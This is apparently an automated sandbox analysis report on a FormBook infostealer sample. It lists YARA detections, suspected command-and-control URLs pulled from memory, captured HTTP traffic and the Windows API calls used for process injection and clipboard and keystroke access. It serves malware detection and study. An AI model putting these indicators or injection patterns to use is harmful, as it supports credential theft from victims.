html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 22 Oct 2024 20:58:49 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 22 Oct 2024 20:58:52 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000040B2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://emailverification.info/
            Source: jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000004244000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2
            Source: jEsBIhfnof.exe, 00000006.00000002.4511141181.00000000056A1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.productanalytics.pro
            Source: jEsBIhfnof.exe, 00000006.00000002.4511141181.00000000056A1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.productanalytics.pro/9vwi/
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: schtasks.exe, 00000004.00000002.4508662469.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_des
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: schtasks.exe, 00000004.00000002.4508662469.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: schtasks.exe, 00000004.00000003.2399701813.000000000748C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: schtasks.exe, 00000004.00000002.4510450854.0000000004230000.00000004.10000000.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003F20000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=stocksm.fun
            Source: schtasks.exe, 00000004.00000002.4510450854.0000000004230000.00000004.10000000.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003F20000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000040B2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.icann.org/resources/pages/non-response-2014-01-29-en
            Source: jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003A6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042BEA3 NtClose,2_2_0042BEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F24340 NtSetContextThread,LdrInitializeThunk,4_2_02F24340
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F24650 NtSuspendThread,LdrInitializeThunk,4_2_02F24650
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22AF0 NtWriteFile,LdrInitializeThunk,4_2_02F22AF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22AD0 NtReadFile,LdrInitializeThunk,4_2_02F22AD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22B60 NtClose,LdrInitializeThunk,4_2_02F22B60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02F22EE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22FE0 NtCreateFile,LdrInitializeThunk,4_2_02F22FE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22FB0 NtResumeThread,LdrInitializeThunk,4_2_02F22FB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22F30 NtCreateSection,LdrInitializeThunk,4_2_02F22F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02F22CA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02F22C70
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22C60 NtCreateKey,LdrInitializeThunk,4_2_02F22C60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02F22DF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22DD0 NtDelayExecution,LdrInitializeThunk,4_2_02F22DD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02F22D30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02F22D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F235C0 NtCreateMutant,LdrInitializeThunk,4_2_02F235C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F239B0 NtGetContextThread,LdrInitializeThunk,4_2_02F239B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22AB0 NtWaitForSingleObject,4_2_02F22AB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22BF0 NtAllocateVirtualMemory,4_2_02F22BF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22BE0 NtQueryValueKey,4_2_02F22BE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22BA0 NtEnumerateValueKey,4_2_02F22BA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22B80 NtQueryInformationFile,4_2_02F22B80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22EA0 NtAdjustPrivilegesToken,4_2_02F22EA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22E80 NtReadVirtualMemory,4_2_02F22E80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22E30 NtWriteVirtualMemory,4_2_02F22E30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22FA0 NtQuerySection,4_2_02F22FA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22F90 NtProtectVirtualMemory,4_2_02F22F90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22F60 NtCreateProcessEx,4_2_02F22F60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22CF0 NtOpenProcess,4_2_02F22CF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22CC0 NtQueryVirtualMemory,4_2_02F22CC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22C00 NtQueryInformationProcess,4_2_02F22C00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22DB0 NtEnumerateKey,4_2_02F22DB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F22D00 NtSetInformationFile,4_2_02F22D00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F23090 NtSetValueKey,4_2_02F23090
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F23010 NtOpenDirectoryObject,4_2_02F23010
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F23D70 NtOpenThread,4_2_02F23D70
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F23D10 NtOpenProcessToken,4_2_02F23D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00468CE0 NtCreateFile,4_2_00468CE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00468E50 NtReadFile,4_2_00468E50
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00468F50 NtDeleteFile,4_2_00468F50
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00469000 NtClose,4_2_00469000
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004120380_2_00412038
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004271610_2_00427161
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0047E1FA0_2_0047E1FA
